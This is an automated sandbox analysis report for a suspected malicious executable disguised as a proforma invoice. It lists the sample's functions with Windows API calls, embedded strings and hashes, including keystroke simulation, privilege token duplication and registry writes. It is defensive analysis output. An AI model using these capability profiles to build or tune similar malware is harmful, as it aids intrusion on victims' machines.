                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 277c205c536d7a83afe513ff66e6a7e52bd5c2d0bc1ac755a4f44b637e080448
                                                                                                                    • Instruction ID: 5acac57712cc18ebbc95754a37aaeeb8bc06ceabf0c0cd67fafa083c882d6412
                                                                                                                    • Opcode Fuzzy Hash: 277c205c536d7a83afe513ff66e6a7e52bd5c2d0bc1ac755a4f44b637e080448
                                                                                                                    • Instruction Fuzzy Hash: 0AF03071521752CFCB34AF64E495816F7E1BF1432A320897EEADB82621C7719898DF44
                                                                                                                    Function 00270791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002707B0
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2514874351-0
                                                                                                                    • Opcode ID: c4f8f92a5f38371d9f34b3864653d9015a9891ac7fde5d656b9a390cbfa50b58
                                                                                                                    • Instruction ID: 1a7903964399add20ed79df0f6c8ad3a07f14fc6b4019f766eb1a846db0b4032
                                                                                                                    • Opcode Fuzzy Hash: c4f8f92a5f38371d9f34b3864653d9015a9891ac7fde5d656b9a390cbfa50b58
                                                                                                                    • Instruction Fuzzy Hash: 4CE0CD3694512857C720E658AC0AFEA77DDDF887A1F0441F6FC0CD7248D9709C918AD4
                                                                                                                    Function 0027525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction ID: dc94ae87012001a0849aa80d4de30bd5f8c0cbfb24454f2bd023bace3df93e85
                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction Fuzzy Hash: 9FB0927644020C77CE012A82EC02A497B199B41764F408020FF0C18162A6B3A6749A89
                                                                                                                    Function 00C52168 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00C52179
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: c515d3a8df55d382f386705f70e15161f5965ea81c48076b5a764c923263aef5
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: 0AE0E67494020DDFDB00DFB4D54969E7BF4EF04302F100161FD05D2280D6309D509A62

                                                                                                                    Non-executed Functions

                                                                                                                    Function 002DCABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002DCB37
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCB95
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002DCBD6
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DCC00
                                                                                                                    • SendMessageW.USER32 ref: 002DCC29
                                                                                                                    • _wcsncpy.LIBCMT ref: 002DCC95
                                                                                                                    • GetKeyState.USER32(00000011), ref: 002DCCB6
                                                                                                                    • GetKeyState.USER32(00000009), ref: 002DCCC3
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCCD9
                                                                                                                    • GetKeyState.USER32(00000010), ref: 002DCCE3
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DCD0C
                                                                                                                    • SendMessageW.USER32 ref: 002DCD33
                                                                                                                    • SendMessageW.USER32(?,00001030,?,002DB348), ref: 002DCE37
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002DCE4D
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002DCE60
                                                                                                                    • SetCapture.USER32(?), ref: 002DCE69
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DCECE
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002DCEDB
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002DCEF5
                                                                                                                    • ReleaseCapture.USER32 ref: 002DCF00
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DCF3A
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002DCF47
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DCFA3
                                                                                                                    • SendMessageW.USER32 ref: 002DCFD1
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD00E
                                                                                                                    • SendMessageW.USER32 ref: 002DD03D
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002DD05E
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002DD06D
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DD08D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002DD09A
                                                                                                                    • GetParent.USER32(?), ref: 002DD0BA
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD123
                                                                                                                    • SendMessageW.USER32 ref: 002DD154
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DD1B2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002DD1E2
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD20C
                                                                                                                    • SendMessageW.USER32 ref: 002DD22F
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DD281
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002DD2B5
                                                                                                                      • Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002DD351
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                    • String ID: @GUI_DRAGID$F$pb1
                                                                                                                    • API String ID: 3977979337-1404435443
                                                                                                                    • Opcode ID: 6f76d8e2bbfa239703def1d30e44b9ded4baedd8135ce2e0a68c5ca60de572f5
                                                                                                                    • Instruction ID: 825d299bc9d488ab46584d5db04e4bbe4b55eb929fe587f38adb150cb7ec028d
                                                                                                                    • Opcode Fuzzy Hash: 6f76d8e2bbfa239703def1d30e44b9ded4baedd8135ce2e0a68c5ca60de572f5
                                                                                                                    • Instruction Fuzzy Hash: 5442BA34624642AFD721CF28D848AAABBE5FF49314F24451BF696873A0C731DC64DF92
                                                                                                                    Function 00266F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID: ]0$3c&$DEFINE$P\0$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_&
                                                                                                                    • API String ID: 1357608183-1122871721
                                                                                                                    • Opcode ID: 808482b5a2fafea7e61267295d758db32bd3a5a40d3c3023c8ca992ddd51cda1
                                                                                                                    • Instruction ID: 31f16b010830be6f1d6d6e8a2ce9c7827f5f8e8e21e9b68d181f6619136a4140
                                                                                                                    • Opcode Fuzzy Hash: 808482b5a2fafea7e61267295d758db32bd3a5a40d3c3023c8ca992ddd51cda1
                                                                                                                    • Instruction Fuzzy Hash: 1293B371E20216DFDB24CF58D8817ADB7B1FF49714F24816AE949EB281EB709D91CB40
                                                                                                                    Function 002548D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 002548DF
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0028D665
                                                                                                                    • IsIconic.USER32(?), ref: 0028D66E
                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0028D67B
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0028D685
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0028D69B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0028D6A2
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0028D6AE
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0028D6BF
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0028D6C7
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0028D6CF
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0028D6D2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D6E7
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D6F2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D6FC
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D701
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D70A
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D70F
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D719
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0028D71E
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0028D721
                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0028D748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                    • Opcode ID: 8e9c938a1fa8dd764345261983afa1de6d23c9938dfd26b066caa52667f40cf3
                                                                                                                    • Instruction ID: 541300d1ba30bb564c270efb74530801f0365635a4b740d3a36a2ccc681fc193
                                                                                                                    • Opcode Fuzzy Hash: 8e9c938a1fa8dd764345261983afa1de6d23c9938dfd26b066caa52667f40cf3
                                                                                                                    • Instruction Fuzzy Hash: BE31B375E91318BBEB202F61AC89F7F7F6CEB44B50F144026FA05EA1D1D6B05D10ABA4
                                                                                                                    Function 002A8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
                                                                                                                      • Part of subcall function 002A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
                                                                                                                      • Part of subcall function 002A87E1: GetLastError.KERNEL32 ref: 002A8865
                                                                                                                    • _memset.LIBCMT ref: 002A8353
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002A83A5
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002A83B6
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002A83CD
                                                                                                                    • GetProcessWindowStation.USER32 ref: 002A83E6
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 002A83F0
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002A840A
                                                                                                                      • Part of subcall function 002A81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8309), ref: 002A81E0
                                                                                                                      • Part of subcall function 002A81CB: CloseHandle.KERNEL32(?,?,002A8309), ref: 002A81F2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                    • String ID: $default$winsta0
                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                    • Opcode ID: 8cf3144fd9c65a209042ad45a6b39ec7aff53a6f59fc4be126288ad78d45e6f9
                                                                                                                    • Instruction ID: d5bb6cdd2c43a6a8e674b2768e031ede7f27ccddcee9d59bb09912094614b5a0
                                                                                                                    • Opcode Fuzzy Hash: 8cf3144fd9c65a209042ad45a6b39ec7aff53a6f59fc4be126288ad78d45e6f9
                                                                                                                    • Instruction Fuzzy Hash: 6C817B71C1120AAFDF119FA4DD49AEEBBB9EF05304F14816AFD15A2261DF318E24DB60
                                                                                                                    Function 002BC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002BC78D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BC7E1
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BC806
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BC81D
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 002BC844
                                                                                                                    • __swprintf.LIBCMT ref: 002BC890
                                                                                                                    • __swprintf.LIBCMT ref: 002BC8D3
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • __swprintf.LIBCMT ref: 002BC927
                                                                                                                      • Part of subcall function 00273698: __woutput_l.LIBCMT ref: 002736F1
                                                                                                                    • __swprintf.LIBCMT ref: 002BC975
                                                                                                                      • Part of subcall function 00273698: __flsbuf.LIBCMT ref: 00273713
                                                                                                                      • Part of subcall function 00273698: __flsbuf.LIBCMT ref: 0027372B
                                                                                                                    • __swprintf.LIBCMT ref: 002BC9C4
                                                                                                                    • __swprintf.LIBCMT ref: 002BCA13
                                                                                                                    • __swprintf.LIBCMT ref: 002BCA62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                    • Opcode ID: 5ce33659010c2f9345eb47e2d72955625fd1986aac590fd1fccdd74ff6e17cef
                                                                                                                    • Instruction ID: a45bc348643dbdf815cc3da61dbab6b43ce552e10445d99d340e440a6456c27f
                                                                                                                    • Opcode Fuzzy Hash: 5ce33659010c2f9345eb47e2d72955625fd1986aac590fd1fccdd74ff6e17cef
                                                                                                                    • Instruction Fuzzy Hash: 98A13CB2429304ABC704EFA4C886DAFB7ECBF94701F404919F985C6191EB34DA58CF66
                                                                                                                    Function 002BEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BEFB6
                                                                                                                    • _wcscmp.LIBCMT ref: 002BEFCB
                                                                                                                    • _wcscmp.LIBCMT ref: 002BEFE2
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002BEFF4
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 002BF00E
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002BF026
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF031
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF04D
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF074
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF08B
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF09D
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00308920), ref: 002BF0BB
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF0C5
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF0D2
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF0E4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                    • Opcode ID: 6266a726486589a4bd8f02e278f4276a3f48a31e8048673d4d585b87665d21d8
                                                                                                                    • Instruction ID: baa611e6f9344e20b955ef3db7eaaa33e4ac5ddba27d609573cad4533abf4da3
                                                                                                                    • Opcode Fuzzy Hash: 6266a726486589a4bd8f02e278f4276a3f48a31e8048673d4d585b87665d21d8
                                                                                                                    • Instruction Fuzzy Hash: A83116329112096ACB90EFB4ED4CAEE77AC9F483A0F144572E845E20A1EB70DE50CE54
                                                                                                                    Function 002D0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0953
                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,002DF910,00000000,?,00000000,?,?), ref: 002D09C1
                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002D0A09
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002D0A92
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 002D0DB2
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002D0DBF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                    • Opcode ID: a8e677a1f4d78464d31feeffa8603e8169502ab59929452455242e3f60be8662
                                                                                                                    • Instruction ID: b197ca8e18e5866096f9118f77658f18969d21f06c9182bf9c7dd298e478e7d9
                                                                                                                    • Opcode Fuzzy Hash: a8e677a1f4d78464d31feeffa8603e8169502ab59929452455242e3f60be8662
                                                                                                                    • Instruction Fuzzy Hash: D50249756206019FCB54EF14C895E2AB7E5EF89314F04845EF88A9B3A2CB30ED65CF85
                                                                                                                    Function 002666E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0D/$0E/$0F/$3c&$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG/$_&
                                                                                                                    • API String ID: 0-303758664
                                                                                                                    • Opcode ID: fc2ae018e024eca97284d92cc3c81209059b0263065a40dfa1e3e9840ed61a2d
                                                                                                                    • Instruction ID: 276810a246fbd7d00cadf4a4b50f6f6468d20f3d2487d9da44b378cd321a38b9
                                                                                                                    • Opcode Fuzzy Hash: fc2ae018e024eca97284d92cc3c81209059b0263065a40dfa1e3e9840ed61a2d
